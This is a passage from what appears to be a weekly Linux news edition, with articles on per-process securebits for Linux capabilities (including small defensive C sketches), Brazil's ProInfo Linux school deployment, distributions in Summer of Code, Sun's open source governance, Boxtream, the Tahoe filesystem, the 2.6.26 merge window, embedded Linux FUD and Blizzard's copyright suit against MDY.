around Linux filesystems.  The challenges in this area are large, but we
have many highly capable developers working on the problem and there can be
no real doubt that Linux filesystems will continue to be among the best
available anywhere.  But
that development community has lost a voice which, for all its faults, had
some unique and innovative things to say, and we are all poorer for it.

		Restricting root with per-process securebits


Linux capabilities have had a long and somewhat tortuous journey as part of
the Linux kernel.  Slowly—and very carefully—functionality is
being added to this security feature to get it to a point where it is a
viable alternative to the all-or-nothing setuid(0) model.  A
recently merged patch
adds a per-process securebits feature that will allow capabilities-based
daemons or subsystems to coexist with existing setuid utilities.


Linux capabilities break up the privileged tasks
normally associated with root (i.e. uid 0) into finer-grained abilities
which can be individually granted or revoked for specific processes.  The
idea is to change the standard Unix model that root has all special
privileges while all other users have none.  
The terminology is always a bit contentious, though, as Linux capabilities are
derived from a POSIX proposal that was never adopted, but share the name
"capabilities" with an entirely
different approach; this article is only concerned with capabilities of
the Linux variety.


There has long been interest in creating a Linux system that did not rely upon
a single root account.  Capabilities are seen as the way to
get there, but they have suffered from a bit of a chicken-and-egg problem.
With the recent work to add file-based
capabilities and restore
CAP_SETPCAP to its original meaning, a true
capabilities-based system is becoming possible.  In the patch, which has
been merged for 2.6.26, Andrew Morgan describes the new functionality:

The feature added by this patch can be leveraged to suppress the privilege
associated with (set)uid-0.  This suppression requires CAP_SETPCAP to
initiate, and only immediately affects the 'current' process (it is inherited
through fork()/exec()).  This reimplementation differs significantly from the
historical support for securebits which was system-wide, unwieldy and which
has ultimately withered to a dead relic in the source of the modern kernel.


The patch removes the global securebits variable, replacing it with an
entry in struct task_struct that can be manipulated by a process,
but only for itself and any children.  Morgan envisions hybrid
systems that have some utilities using capabilities to get their
privileges along with some
setuid(0) utilities.  In that scenario, a capabilities-based
utility or daemon may wish to limit what its children can do, even if they execute a
setuid(0) binary.  As part of the evolution, process trees can be
created that cannot get root privileges.


Processes which have the CAP_SETPCAP capability can change their securebits setting
via the prctl() system call.  There are three separate bits that
govern the interaction of capabilities and setuid:

SECURE_NOROOT – enabling this gives no special privileges to uid 0
SECURE_NO_SETUID_FIXUP – setting this bit disables capability
fixes when transitioning from or to uid 0 via setuid.  This might be
done for compatibility with older programs that use setuid to
reduce their privileges.
SECURE_KEEP_CAPS – when set, a process can retain its
capabilities even when transitioning to a normal (not uid 0) user.  This
bit is cleared by exec().

Each of these bits also has a companion *_LOCKED bit that, if set,
will not allow any user program to alter the corresponding setting.
As Morgan notes in the patch, a program that can set its capabilities (has
CAP_SETPCAP) can drop all privileges for itself and any child
process with a single prctl() call that sets SECURE_NOROOT, SECURE_NOROOT_LOCKED,
SECURE_NO_SETUID_FIXUP, SECURE_NO_SETUID_FIXUP_LOCKED, and
SECURE_KEEP_CAPS_LOCKED.
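
For the curious, that combination can be built up bit by bit. The following is a minimal sketch which assumes the bit numbering used in the kernel's securebits header (NOROOT at bit 0 through KEEP_CAPS_LOCKED at bit 5); the SB_* names and the two helper functions are made up for illustration, and the fallback value for PR_SET_SECUREBITS is likewise assumed from the kernel's prctl header.

```c
#include <sys/prctl.h>

#ifndef PR_SET_SECUREBITS
#define PR_SET_SECUREBITS 28   /* assumed: value from the kernel's prctl header */
#endif

/* Illustrative names; bit positions assumed from the kernel's
 * securebits header. */
enum {
    SB_NOROOT                 = 1 << 0,
    SB_NOROOT_LOCKED          = 1 << 1,
    SB_NO_SETUID_FIXUP        = 1 << 2,
    SB_NO_SETUID_FIXUP_LOCKED = 1 << 3,
    SB_KEEP_CAPS              = 1 << 4,
    SB_KEEP_CAPS_LOCKED       = 1 << 5
};

/* The combination listed in the text.  KEEP_CAPS itself stays clear,
 * but is locked in that state. */
unsigned long lockdown_mask(void)
{
    return SB_NOROOT | SB_NOROOT_LOCKED |
           SB_NO_SETUID_FIXUP | SB_NO_SETUID_FIXUP_LOCKED |
           SB_KEEP_CAPS_LOCKED;
}

/* Apply the mask to the calling process.  Returns 0 on success, or -1
 * with errno set (EPERM if the caller lacks CAP_SETPCAP). */
int lock_out_root(void)
{
    return prctl(PR_SET_SECUREBITS, lockdown_mask());
}
```

With that numbering the mask works out to 0x2f.  Since the locked bits cannot be cleared again, a program making this call should be quite sure that neither it nor any of its descendants will ever need uid-0 privilege.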


The memory of the sendmail-capabilities bug from 2000 makes some
a bit queasy—or worse—about any patches that involve
capabilities and setuid.  Andrew
Morton asks: "what was the bug which
caused us to cripple capability inheritance back in the days of yore? (Some
sendmail thing?)" 
That bug arose because unprivileged users could take away the
CAP_SETUID capability from setuid binaries like
sendmail.  When sendmail then used setuid to drop its privileges,
the call failed, but sendmail did not check the result, so it kept running with full
privilege.  This could be leveraged by a user to gain root privileges. It
was a disconnect between capabilities and 
the longstanding behavior of Unix-like systems when dropping privileges.
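
The defensive pattern which would have avoided that problem is simple enough to show. This is a sketch with an invented helper name, not code taken from sendmail or from the patch under discussion:

```c
#include <sys/types.h>
#include <unistd.h>

/* Switch to `uid` and confirm that the switch really happened.
 * Returns 0 on success, -1 if privileges could not be dropped, in which
 * case the caller should refuse to continue. */
int drop_to_uid(uid_t uid)
{
    if (setuid(uid) != 0)
        return -1;            /* the check whose absence caused the trouble */

    /* Belt and braces: verify the resulting identity as well. */
    if (getuid() != uid || geteuid() != uid)
        return -1;

    return 0;
}
```

A program which treats a -1 return as fatal cannot be tricked into carrying on as root just because somebody upstream has quietly removed the capability that setuid() depends upon.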


Morgan has written a
detailed
description of the sendmail-capabilities bug in response to Morton's
questions.  He makes it clear that he wants to move toward full capability
support without breaking existing code:

I'm basically interested in evolving the capability implementation
back to the POSIX.1e model and making it whole - but most certainly
*without crippling legacy superuser support in the process* .

As folk get more comfortable with this full capability model. I
believe we can delete more cruft from the main kernel, but even that
clean up will leave a fully functional legacy model in place. I feel
it should be for something like init, or one of its children to be
able to run subsystems in capability-only or legacy modes.


Morton seemed satisfied that his concerns had been addressed, but still
wonders about the future for capabilities: "So how do we ever get to the stage where we can recommend that distributors
turn these things on, and have them agree with us?"  This was echoed by Ismail Dönmez, who was looking
for concrete examples of how to use the per-process securebits feature.
Morgan provides a pointer to some examples along with his belief that
sometime soon the capabilities developers will become confident enough to
recommend turning off the "experimental" flag for the
SECURITY_FILE_CAPABILITIES kernel configuration option.  That flag
governs both the file-based capabilities and the per-process
securebits.  In addition, Morgan says:

More importantly I'm hopeful that in that time we'll have accumulated
enough documentation and user-space experience and examples to convince
others that this is, indeed, a viable feature to support in mainstream
distributions.


A developerWorks
article on file-based capabilities by Serge Hallyn and a web page on POSIX
capabilities by Chris Friedhoff were both mentioned in the thread as
good references for the work being done to actually use capabilities
in systems.  Those pre-date the securebits work, so Dönmez was looking
for use-cases for the new feature.  Morgan replied that containers were
one, deferring to Hallyn who has some ideas on
using securebits:

We tend to talk about 'system containers' versus 'application
containers'. A system container would be like a vserver or openvz
instance, something which looks like a separate machine. I was
going to say I don't imagine per-process securebits being useful
there, but actually since a system container doesn't need to do any
hardware setup it actually might be a much easier start for a full
SECURE_NOROOT distro than a real machine. Heck, on a real machine init
and a few legacy [daemons] could run in the init namespace, while users
log in and apache etc run in a SECURE_NOROOT container.

But I especially like the thought of for instance postfix running in a
carefully crafted application container (with its own virtual network
card and limited file tree and no visibility of other processes) with
SECURE_NOROOT on.


Capabilities are an interesting, but complicated, security feature.  For
most of the ten years they have been part of the Linux kernel, they have
either been broken, ignored, or both.  With the latest work being done by
Hallyn, Morgan, and others, capabilities are finally becoming a fully-working
alternative to things like SELinux.  It will be interesting to see if
more user utilities will become capability-aware and whether distributions
start using capabilities.  Some day, root may just fade away.


		Large educational Linux deployment for Brazil


Numbers like 52 million are attention grabbers, especially when they refer
to students getting access to Linux.  That's the number of Brazilian
public school students who will have access to Linux-based educational
computers in some 53,000 labs spread throughout the country.  As reported 
on Mauricio Piacentini's weblog, the Brazilian government already has
17,000 of the labs up and running and plans to have the rest rolled out by the
end of 2009.


The project, called ProInfo, is run by the Ministry of Education (MEC) for
Brazil.  Piacentini heard about it at the recent Fórum Internacional Software
Livre (FISL) conference, which is held annually in Porto Alegre,
Brazil.  He noted that the project is not only providing computers and
infrastructure, but also a "Linux Educacional" distribution with free
educational and entertainment software along with other "open content".


The distribution is Debian-based and uses KDE 3.5 as its desktop.
Packages from the KDE Education Project
(KDE-Edu) and KDE Games Center
(KDEGames) were included.  The project customized the interface, adding a
quick navigation bar at the top.  This is the second version
of the distribution; it incorporates feedback from installations of the
previous version.  The distribution ISOs, open content, and some
documentation (all in Portuguese) can be found at the MEC ProInfo
website.  

ProInfo has devised several lab configurations, chosen according to
where the school is located.  Urban labs have
equipment for up to fifteen students whereas rural installations have
power-friendly hardware that can support up to five users.  There is also a
configuration targeted at schools for people with special needs that has a large
display and accessibility tools added to the distribution.  ProInfo also
has a project that sounds much like OLPC, except in Portuguese: Um
Computador por Aluno ("One computer per student") that plans to bring
150,000 laptops (possibly Intel Classmate PCs) to students over the next
year or so.


Some have quibbled about the number of students estimated, but even if it is
overestimated by a factor of two or three—which seems
unlikely—it is still an enormous project that will impact a huge
number of students.  Free software is perfect for these kinds of projects,
because it can reduce the hardware requirements significantly, eliminate
licensing nightmares, and provide a look "under the hood" for students who
are interested.  Computer skills are largely portable, should some of
those students end up using other operating systems in the future, and,
because they are using free software now, any documents, pictures, music,
and other data files will be able to move with them.


Folks from the KDE project are justifiably proud of this deployment.
It uses KDE 3.5, but plans are afoot to work with MEC to explore using KDE4
down the road, according to KDE hackers Piacentini and Aaron
Seigo.  Many have been concerned about the future of KDE 3.5, but the
project has always maintained that it will be around for a long time.  As
Seigo says: 

KDE 3.5 will be supported in the market for many years to come due to
deployments such as this one. Looking towards the future, KDE4 will likely
make some things even easier for them in the future, such as how to
implement the navigation bar they added to the top of desktop as a result
of usability research done involving this specific audience. With Plasma, a
few lines of JavaScript is all that would be needed. 


Proponents of the other desktops or distributions should be cheering this
deployment as well.  There will probably be lots of lessons learned that
can apply to other projects in Brazil or elsewhere that standardize on a
different set of software components.  This is an exciting project for
the free software community.  But even more importantly, it is great to see
so many of these tools become available to those who have not yet been
exposed to them.   


		Distributions in the Summer of Code


  For the fourth year, Google's
  Summer of Code will pay undergraduate students to work with some of the
  world's top developers on open-source projects. Students and mentors also
  get a T-shirt, which for many of us is motivation enough. Many of the accepted projects are not
  surprising, such as GNOME, KDE, Drupal, and Python. One interesting category
  of projects, however, is distributions. Aren't they just writing packages?
  What would they do with a Summer of Code project? That's what this article
  aims to discover.


  This year, four distributions were accepted for a combined total of 40
  slots: Debian, Fedora, Gentoo, and openSUSE. Conspicuous in their absence
  are other major distributions such as Mandriva and Ubuntu. One wonders what
  happened—did they apply (if not, how come?); were they rejected?
  Ubuntu participated in 2006 and 2007, so it is curious that the
  distribution is not in SoC this year. In addition to these four
  distributions, three of the BSDs participated as well, receiving a combined
  total of 42 slots: DragonFly BSD, FreeBSD, and NetBSD. Since these are
  operating systems in addition to their own package distributions, many of
  their slots are devoted to core OS code, while the Linux distributions'
  slots are not.


  Let's take a closer look at the types of distribution projects in this year's
  Summer of Code. All but one of Debian's 12 projects relate to installation (two
  slots), configuration management (two slots), or package
  management/development (seven slots). The exception is a project to make an
  embedded, Debian-based NAS device.


  Another 12 slots went to Fedora, which shared two of its slots with
  JBoss. Fedora has a more eclectic mix: it devoted two slots to package
  management and two to configuration management, investing the remaining slots
  in features for a translation framework (three), creation of a new Web interface
  for the hardware profiler Smolt, enhancement of the
  booting profiler Bootchart to use SystemTap, and creation of a
  simple, non-linear video editor for ogg video to integrate with the
  screencasting tool recordmydesktop.


  Gentoo received six slots, of which two relate to package management. The other
  four are dedicated to diverse projects: implementing OpenPAM-compatible modules
  for Linux, improving a Web-based, WYSIWYG XML editor, making it easy to set
  up a Beowulf cluster, and improving Gentoo's embedded network-appliance
  framework.


  OpenSUSE got ten slots; five of these are going toward package
  management/development, and one is going toward installation. The remaining four
  are the most generally interesting: implementing a face-based authentication
  module, enabling ext4 as GRUB's boot partition, interactive crash analysis
  (presumably an improvement upon what recent GNOME versions do rather than a
  duplication), and creation of a GUI manager for LTSP thin clients.


  Now let's take a quick look at BSD land. Of DragonFly's projects, six out
  of seven are
  OS-related, and the other is installation-related. FreeBSD received 21
  slots, of which many are devoted to the core OS—of the rest, four are
  related to package management/development, and one aims to improve Wine
  support. NetBSD received 14 slots, of which many again went to the core OS.
  Other than that, one slot went to installation and another to package
  management.


  Distributions and "mixed" distributions/OSs unsurprisingly devote a large
  quantity of their efforts to their core competencies of package management,
  configuration management, and installation. At least in the Summer of Code,
  however, they do devote a significant amount of effort to solving larger
  problems that affect people outside the distribution.


		Sun and corporate open source


Over the last couple of weeks there has been an interesting set of articles
posted on various weblogs on how Sun is managing its open source projects.
As more companies try to get involved with free software, they may find
things to learn from this discussion.  So here are a few thoughts on
corporate open source.


It all started with a
posting by Ted Ts'o which stated:


	So if you run into a Sun salescritter or a Sun CEO claiming that
	OpenSolaris is just like Linux, it's not. Fundamentally, Open
	Solaris has been released under a Open Source license, but it is
	not an Open Source development community. Maybe it will be someday,
	as some Sun executives have claimed, but it's definitely not a
	priority by Sun; if it was, it would have been done before now.


The posting drew responses from Dave
Neary and Alvaro
Lopez Ortega, among others; both the original message and the
responses to it are
worth reading in their entirety.  In summary, the responses say that (1) Sun
really is trying to be a good open source player, and (2) Sun has done
as well as could be expected, given that the creation of
true open source communities is hard.


The first part can only be true.  Sun has been the source of a great deal
of free software, including packages like OpenOffice.org which are found in
almost every Linux distribution.  This company has released its core
operating system as open source, and it is making noises about, finally,
making Java truly open at all levels.  There are few companies which have
contributed code at this level, and that should be recognized.  Beyond any
doubt, Sun is contributing to this community.


What people question, though, is Sun's interest in creating real
communities around its open source projects.  These projects are
notoriously hard to participate in and contribute to.  As Ted points out,
OpenSolaris currently gets less than one patch per day from outside the
company, the project's governing board is made up entirely of Sun
employees, and its (non-distributed) revision control system lives inside
the Sun firewall.  External OpenSolaris developers have been known to quit with
messages
like:


	Sun agreed that "OpenSolaris" would be governed by the community
	and yet has refused, in every step along the way, to cede any real
	control over the software produced or the way it is produced, and
	continues to make private decisions every day that are later
	promoted as decisions for this thing we call OpenSolaris.  Rather
	than be honest about it and restructure the community to correspond
	to this MySolaris style of over-the-wall development, Sun prefers
	to lie to the external community members while ignoring their
	input.


OpenOffice.org, too, remains hard to work with; thus the
many discouraged comments on the ooo-build
wiki from developers who want to get things done:


	Many ooo-build patches are ready for up-streaming but there is no /
	little response from up-stream. Worse there is the perception that
	taking leadership and actually doing something about merging fixes
	would be firmly opposed. Finally - even when maintainers are
	active, responsive & friendly - there is no agreed mechanism for
	blanket approving fixes - or sub-types of trivial fixes, which thus
	tend to fester in IssueZilla. 


The key to what is going on here can be found in many places, including in
Alvaro's posting:


	Besides, the OpenSolaris development model is quite different
	because of a number of technical reasons. IMO, the first one is
	something as simple as that we want to ensure its quality by
	following a number of processes. Another very important technical
	point is that we want OpenSolaris to continue being binary
	compatible (ABI) with the previous Solaris revisions, which is
	something Linux could not even dream of.


The real issue is control; Sun does not want to relinquish control over how
its projects evolve.  This is not a particularly uncommon situation with
corporate-controlled projects; these projects will always be subject to the
controlling company's agenda.  Thus, no developer is likely to be
successful in projects like:


 Adding features to MySQL which provide the functionality which is
     otherwise being reserved for the "enterprise" offerings.

 Adding packages to Fedora which make Red Hat's legal department
     nervous. 

 Adding features to projects owned by the Free Software Foundation
     which, in the FSF's opinion, are not consistent with its goals;
     support for loading Emacs modules from an external repository is one
     example.

 Making any changes to Firefox which could threaten Mozilla
     Corporation's revenue stream from Google.


Companies which control open source projects in this way are generally
acting within their rights; they may even be acting in their own best
interests.  The software is still open source.  But the retention of this
sort of control will have an effect on the community which builds around
the software.  In many cases, it can have the effect of preventing the
creation of that community in the first place.

And that, too, may be what the company had in mind.  There are a number of
company-controlled open source projects which, by all appearances, are
mostly for show and bragging rights.  The company does not really seem to
have much interest in developing a significant external community.  In
cases like this, if the software on offer is valuable enough, the result
will often be a more community-oriented fork.  Projects like ADempiere, LedgerSMB, and Cinelerra CV result from this kind of
frustration.


Opinions clearly differ on whether Sun is truly uninterested in the
creation of outside development communities for its projects, or whether it
simply is having a hard time letting go.  If the latter is the case, then
Sun might be well advised to follow Dave
Neary's suggestion and create a separate, non-profit foundation for the
development of OpenOffice.org.  Sun's apologists are right when they say
that turning a large blob of proprietary code into free software is a hard
thing to do.  But it's harder if you don't give the community the power to
help; in the case of OpenOffice.org, there would appear to be enough of an
interested community to make a real go at it.  This might be Sun's best
chance to show that it can create real development communities
around its software.

		Stream video and audio with Boxtream


Boxtream
is a GPL-licensed streaming video and audio system that is being
developed by Jerome Alet and a
team of developers at the University of Nice in France:


Boxtream is a mobile and autonomous audio and video streaming and recording studio. Of course, depending on your own hardware choices, the number and extent of capabilities and the quality of the final results may vary, but at least the software part should be versatile enough to accommodate even the most basic hardware.
Boxtream was mostly designed to stream live courses featuring a professor and his slides (or any other computer based output like software training, web browser, video player...), but can also be used to stream congresses, interviews and the like.


Boxtream uses a veritable smorgasbord of open-source components to achieve
its results.  Scripting is done with the Python language, and metadata is
stored in the XML format.
The GStreamer multimedia framework library is used for handling the audio/video
data, and the Icecast streaming media
server is used for media distribution.
Video and audio are encoded with Ogg Theora and Ogg Vorbis.  The
Graphviz graph visualization
software is used for presenting a graphical view of the video
system's scenario.


A few notable Boxtream features include a GUI, support for
on-disk recording, selectable audio and video rates, support for
image overlays, and automation for all tasks.
The Boxtream features list is more complete.
Boxtream supports a number of video switching devices as well as other
video and audio equipment.  The hardware list has more information.


This 
architecture diagram gives a pictorial view of a fairly complicated
Boxtream system.  An online
example
shows the system being used for a scientific conference.


Boxtream version 0.998 was
announced
on April 27, 2008.
Changes include support for more video hardware, inclusion of the dia
schema software, bug fixes and a license change from GPLv2 to GPLv3.
If your organization is in need of a full-featured video conferencing
system, you should give Boxtream a look.


		The Tahoe secure filesystem


The Tahoe filesystem is
designed as a secure, distributed filesystem that is available as free
software.  Tahoe is also designed for fault tolerance so that data remains
available even in the presence of missing or
malicious peers.  In March, the project released a 1.0 version which
makes this a good time to take a peek. 


The basics of Tahoe are somewhat similar to GNUnet or Freenet in that the data is encrypted
and spread
around to multiple nodes in the network.  Unlike those, though, Tahoe does
not seek to provide anonymity.  The nodes making up a Tahoe
filesystem are called a "grid". Grids consist of some number of
peers acting as storage server nodes along with an "introducer" that knows
all of the other
nodes and is the central point of contact for the grid.


Files are stored in Tahoe by first being encrypted on the local machine
using AES.  They are then broken into "shares", ten by default,
that are distributed to different servers in the grid.  Before that
happens, though, the encrypted file is encoded in such a way that the whole
file can be recovered even if only a subset of the shares can be retrieved.


This encoding, known as "erasure coding", is the
key to the fault-tolerance of the Tahoe system.  By default, Tahoe encodes
the shares such that retrieving three of the ten is sufficient to recover
the entire file.  It also increases the size of the file by the expected
10/3 ratio.
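
The 3-of-10 idea can be sketched with a toy erasure code.  The article says Tahoe uses zfec for this job; the code below is neither zfec's algorithm nor its API, just a small polynomial-interpolation scheme over the integers modulo 257, with hypothetical function names, written to show why any three shares are enough and where the 10/3 expansion comes from.

```python
P = 257  # smallest prime above 255, so every byte value is a field element


def _interpolate(points, x):
    """Evaluate at x the unique polynomial through `points`, modulo P."""
    total = 0
    for i, (xi, yi) in enumerate(points):
        num, den = 1, 1
        for j, (xj, _) in enumerate(points):
            if i != j:
                num = num * (x - xj) % P
                den = den * (xi - xj) % P
        # pow(den, -1, P) is the modular inverse (Python 3.8 or later).
        total = (total + yi * num * pow(den, -1, P)) % P
    return total


def encode(data, k=3, n=10):
    """Turn `data` (bytes) into n shares; any k of them can rebuild it."""
    padded = data + bytes(-len(data) % k)   # zero-pad to a multiple of k
    shares = {x: [] for x in range(1, n + 1)}
    for off in range(0, len(padded), k):
        # The k data bytes are the polynomial's values at x = 1..k.
        points = [(i + 1, padded[off + i]) for i in range(k)]
        for x in shares:
            shares[x].append(_interpolate(points, x))
    return shares


def decode(subset, length, k=3):
    """Rebuild the original bytes from any k shares ({x: symbols})."""
    xs = sorted(subset)[:k]
    out = bytearray()
    for col in range(len(subset[xs[0]])):
        points = [(x, subset[x][col]) for x in xs]
        out.extend(_interpolate(points, x) for x in range(1, k + 1))
    return bytes(out[:length])


if __name__ == "__main__":
    message = b"tahoe grid"
    shares = encode(message)
    survivors = {x: shares[x] for x in (2, 7, 10)}   # seven shares lost
    print(decode(survivors, len(message)))
```

Each share holds one symbol for every three bytes of padded input, so ten shares together hold 10/3 as many symbols as the input has bytes.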


The suggested use case for Tahoe is a "friendnet" where some group of
friends share their storage with each other in a way that reduces or
eliminates the need for backups.  Tahoe also has ways to share data in
either read-only or read-write (immutable or mutable in Tahoe-speak)
modes.  Tahoe is used as a commercial backup system by Allmydata, sponsor of the
Tahoe project.


Tahoe is designed to be secure, which means that it protects the integrity
and confidentiality of the data stored in it.  SHA-256 is used extensively
to ensure consistency of the plaintext, ciphertext, and shares.  Files
stored in the system are identified by long identifiers called capabilities, that look
something like:

For mutable files, there are two versions of the capability, one that
allows only reading, while the other allows writing as well.  Anyone who
does not have a
capability string for a particular file cannot access it at all.


 Multiple user interfaces are available for Tahoe, including a web
interface, a command-line interface, a FUSE extension and a web API.
Tahoe is written in Python, using some C extensions for efficiency.  It
uses the Twisted framework for
event handling, pycryptopp (a Python
interface to the Crypto++ library) for its encryption needs, and zfec for the erasure coding.
All of the Tahoe code is available under the GPL.

 Installing Tahoe was fairly straightforward—there were a few
hiccups which have since been resolved—using the installation
guide.  Joining the test grid was as
easy as putting an introducer identifier into a file and starting Tahoe
from the command line.  In some basic testing, it seems to work quite well,
overall, though it did not seem to use available bandwidth as efficiently
as it might.  


This brief overview only scratches the surface of the information available about Tahoe; there is much more on the documentation page.  For anyone interested in distributed, secure, and/or fault-tolerant
filesystems, Tahoe is definitely worth a look.  

		The last things through the 2.6.26 merge window


About 500 changesets were merged after the publication of the first and second 2.6.26 merge window
summaries.  The merge window is now closed; here is the final set of
changes which got in:


 New drivers for Solarflare Communications Solarstorm SFC4000
     controller-based Ethernet controllers,
     Hauppauge HVR-1600 TV tuner cards,
     ISP 1760 USB host controllers,
     Cypress c67x00 OTG controllers, and
     Intel PXA 27x USB controllers.


 8KB stacks are, once again, the default for the x86 architecture.
     "Out-of-memory situations are less problematic than silent and
     hard to debug stack corruption."

 The klist type now has the usual-form macros for declaration and 
     initialization: DEFINE_KLIST() and KLIST_INIT().
     Two new functions (klist_add_after() and
     klist_add_before()) can be used to add entries to a klist in
     a specific position.

 As had been planned, struct class_device has been removed
     from the driver core, along with all of the associated infrastructure.
     Classes are now implemented with an ordinary struct device.

 kmap_atomic_to_page() is no longer exported to modules.

 There are some new generic functions for performing 64-bit integer
     division in the kernel:


     Unlike do_div(), these functions are explicit about whether
     signed or unsigned math is being done.  The x86-specific
     div_long_long_rem() has been removed in favor of these new
     functions.

 There is a new string function:


     It compares the two strings while ignoring an optional trailing
     newline. 

 The prototype for i2c probe() methods has changed:


     The new id argument supports i2c device name aliasing.

 There is a new configuration option (MODULE_FORCE_LOAD) which
     controls whether the loading of modules can be forced if the kernel
     thinks something is not right; it defaults to "no."
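
Two of the behaviors described in the list above, division that is explicit about signedness and a string comparison that ignores an optional trailing newline, can be modeled in a few lines.  This is a user-space sketch of the described semantics only, not the kernel's implementation; all three function names are hypothetical, and the 64-bit width is an assumption made for the unsigned case.

```python
def div_signed_rem(dividend, divisor):
    """Signed division truncating toward zero, as C integer division does.

    Python's own // operator floors instead, so the sign handling is
    done by hand here.
    """
    quotient = abs(dividend) // abs(divisor)
    if (dividend < 0) != (divisor < 0):
        quotient = -quotient
    return quotient, dividend - quotient * divisor


def div_unsigned_rem(dividend, divisor, bits=64):
    """Unsigned division: both operands are first reduced to `bits` bits."""
    mask = (1 << bits) - 1
    dividend &= mask
    divisor &= mask
    return dividend // divisor, dividend % divisor


def streq_ignoring_newline(a, b):
    """Compare two strings, ignoring one optional trailing newline on each."""
    if a.endswith("\n"):
        a = a[:-1]
    if b.endswith("\n"):
        b = b[:-1]
    return a == b


if __name__ == "__main__":
    print(div_signed_rem(-7, 2))
    print(div_unsigned_rem(-7, 2))
    print(streq_ignoring_newline("enabled\n", "enabled"))
```

The same bit pattern gives very different answers under the two divisions, which is the ambiguity that explicitly signed and unsigned helpers remove.  The string helper is the sort of comparison that is convenient when input arrives with a newline appended, as it does when written with echo.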


		How not to sell embedded Linux


Every now and then one should have a look at some unabashed fear,
uncertainty, and doubt (FUD) material.  It's good to know what the other
side is saying, the level of unintended humor is often high, and, on occasion, one even
learns something.  Your editor's suggestion for FUD of the week is this Embedded.com
article by Dan O'Dowd.  Therein, one will learn about the impending
death of embedded Linux as told by the companies which sell embedded Linux.


In particular, Mr. O'Dowd looks at some marketing material from MontaVista
and Wind River, and concludes:


	This embedded Linux bashing from embedded Linux's strongest
	proponents should give pause to those who are thinking through
	their embedded operating system strategy. If embedded Linux
	champions are saying that embedded Linux is terrible, why would
	anyone want to risk their products or their company on it? 


One can easily pick holes in this article, starting with the assertion that
MontaVista and Wind River are "Linux's strongest proponents."  One could
also recall that we have heard this kind of thing before; in 2004,
Mr. O'Dowd (who happens to be the founder and CEO of a proprietary embedded
systems software vendor)
helpfully warned us
that "intelligence agencies and terrorists" would contribute "subversive
software" to Linux and lectured on the need for secret
source code to achieve true security.  One could point out that many of the
points put forward by Mr. O'Dowd appear to be pure fantasy.
All of these rebuttals would be valid, but they
risk missing an important point to be gained from this article - though
it's not quite the point Mr. O'Dowd is trying to make.


Mr. O'Dowd obtains his "facts" from two sources: an advertisement by Wind
River Systems (which your editor was unable to find online) and, primarily,
a column by MontaVista founder Jim Ready in Military
Embedded Systems magazine.  Mr. Ready's evident purpose is to frighten
embedded systems vendors into buying his company's services; to that end,
he lays it on pretty thick:


	To keep abreast of the changes occurring on a daily basis, a
	developer needs to monitor the email traffic of 11 different and
	unsynchronized open source projects: kernel.org, the core home of
	the Linux kernel; the gcc and glibc projects (the core tool chain
	and libraries from FSF at fsf.org); and at least nine other
	components that would typically comprise a useable Linux
	development environment. 

	Kernel.org itself may have up to 5,000 messages a day with 1,000 of
	these being patches that need to be evaluated and possibly applied
	to the source base. Simply ignoring the traffic, figuring that the
	system in use seems to be working well enough, can lead to
	disastrous consequences later. For example, a recent security patch
	that took all of 13 lines of code to implement against an embedded
	Linux system would have taken more than 800k lines of source
	patches to implement if the previous trail of patches had been
	ignored. It's a classic case of pay now or really pay later.


Somebody must have had a great deal of fun putting all of those numbers
together.  The generation of ordinary random numbers can be managed through
traditional methods like a toss of the dice, picking numbers out of a hat,
or reading corporate earnings estimates.  Randomness on this scale, though,
can only be achieved through the use of special-purpose software.


Even by kernel.org standards, 5,000 messages per day is fairly intense,
though your editor, a subscriber to the linux-kernel, git-commits-head, and
mm-commits lists, can attest that the order of magnitude is right at least.
But your editor cannot even begin to grasp the thought process which turns
a 13-line security patch into 800,000 lines of code.  Imagine posting
that to linux-kernel.  "Pay now or really pay later" indeed.


But the provenance of the numbers is not really the point here.  Mr. Ready
is perpetrating the fallacy that, to build an embedded system with Linux,
one starts with the various components and integrates them all by hand.
If a company were to take that path, it might well incur the high costs
that Mr. Ready warns about.  Creating your own distribution - and
maintaining it over a product's life - is, indeed, a difficult and
expensive job.

But it is a rare vendor which does that; even Gentoo users outsource
much of the integration work to their distributor.  Why would any vendor
create its own distribution when there are so many out there to base a
product on?  Customizing a distribution for an embedded application is not
a trivial job, but it's not rocket science either.  The distributor will
keep up with most of those mailing lists, and, somehow, a reasonable
distribution also manages to ship security updates which do not involve
800,000 lines of code.  There is no reason for embedded systems vendors to
wander into the expensive mess that Mr. Ready describes; the creation of a
suitable distribution is much easier than that.


Even so, many vendors may decide that, in fact, they would rather not be in
the business of customizing distributions.  They might, instead, look to a
vendor to do that work for them.  It makes perfect sense for companies like
MontaVista and Wind River (among others) to offer to provide a stable,
integrated, and supported platform to embedded systems vendors for a
fee.  There is honest value in this line of business.


But one does have to wonder why these companies feel the need to scare
companies into buying their services.  Those services, properly rendered,
have a real value which can be sold without resort to outright FUD.
Failure to focus on that value gives encouragement to people like
Mr. O'Dowd, who would be most pleased if embedded Linux were to go away
altogether.  This does not seem like a sensible business strategy.
Companies which seek to make money from Linux might just want to think
twice before poisoning the well they are trying to drink from.  That
is the real lesson to be learned from this particular piece of writing.

		Blizzard tests the reach of copyright law


Free software users rarely, if ever, need to be concerned about the license
that governs the applications they use.  Unlike developers or distributors,
users are unlikely to pay attention to whether a program is released
under a BSD, GPL, or some other license—not so with proprietary
software.  If Blizzard Entertainment has its way, it could get a whole
lot worse, with proprietary vendors controlling the behavior of their users
and enforcing that control by way of the Copyright Act.


Blizzard, makers of the online role-playing game World of Warcraft (WoW), has
filed a lawsuit
against MDY, Inc., makers of a tool that assists players in gaining levels
within the game.  The Glider program
essentially plays the game for a user, creating a more powerful character,
with additional riches, while the user is otherwise occupied.  Some would
claim it is a legitimate way to avoid some of the drudgery of "leveling up"
a new character, while others would see it as a means of cheating.  In any
case it is clearly a violation of the Terms of
Use (TOU) of WoW.

But those terms are only accepted by a user when they agree to the End
User License Agreement (EULA) that comes with the game.  Blizzard would
seem to have plenty of ammunition to take action against players who use
Glider, but instead of suing its customers for breach of contract (perhaps
it has learned something by watching the music industry), it went after
the easier target.  Had it only sued MDY for "tortious interference with
contracts", the suit probably would have attracted little attention.  But
Blizzard aroused the interest of the Electronic Frontier Foundation (EFF),
Public Knowledge, and others by trying to stretch copyright law to cover
MDY's actions.

Certainly Blizzard is no stranger to using copyright law—in particular the
much-despised Digital Millennium Copyright Act (DMCA)—in ways that many
have found objectionable.  The courts, at least in the Blizzard v. BNETD
case, have agreed with Blizzard, though, shutting down the development
of an alternative
server for players of their games.  Because of that, any time Blizzard makes a copyright
claim, serious scrutiny from various watchdogs can be expected.


Blizzard's claim is that, by running Glider, its users are not only in violation of
